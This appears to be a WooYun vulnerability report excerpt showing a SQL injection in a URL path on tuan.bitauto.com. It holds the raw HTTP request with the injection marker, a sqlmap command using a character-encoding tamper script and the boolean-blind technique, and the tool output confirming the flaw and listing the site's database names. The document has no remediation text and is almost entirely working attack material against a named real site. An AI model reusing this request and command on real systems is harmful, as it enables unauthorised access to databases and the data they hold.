WooYun.org

GET /ajax/getSearch/9 * /2715 HTTP/1.1
Host: tuan.bitauto.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: sss
Connection: keep-alive
Cache-Control: max-age=0

root@bt5:/pentest/database/sqlmap# python sqlmap.py -r /1.txt --technique=B --string purchase_id --tamper charencode --dbs --threads 5
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:41:52
[17:41:52] [INFO] parsing HTTP request from '/1.txt'
[17:41:52] [INFO] loading tamper script 'charencode'
custom injection mark ('*') found in '-u'. Do you want to process it? [Y/n/q] y
[17:41:54] [INFO] resuming back-end DBMS 'mysql' 
[17:41:54] [INFO] testing connection to the target url
[17:41:54] [INFO] heuristics detected web page charset 'ascii'
[17:41:54] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://tuan.bitauto.com:80/ajax/getSearch/9  AND 4516=4516 /2715
---
[17:41:55] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[17:41:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.9, Apache 2.2.23
back-end DBMS: MySQL 5
[17:41:55] [INFO] fetching database names
[17:41:55] [INFO] fetching number of databases
[17:41:55] [INFO] resumed: 3
[17:41:55] [INFO] retrieving the length of query output
[17:41:55] [INFO] retrieved: 18
[17:41:59] [INFO] resuming partial value: 'i'
[17:42:09] [INFO] retrieved: information_schema             
[17:42:10] [INFO] retrieving the length of query output
[17:42:09] [INFO] retrieved: 10
[17:42:25] [INFO] retrieved: hd_huodong             
[17:42:25] [INFO] retrieving the length of query output
[17:42:25] [INFO] retrieved: 4
[17:42:31] [INFO] retrieved: test           
available databases [3]:
[*] hd_huodong
[*] information_schema
[*] test
[17:42:31] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/tuan.bitauto.com'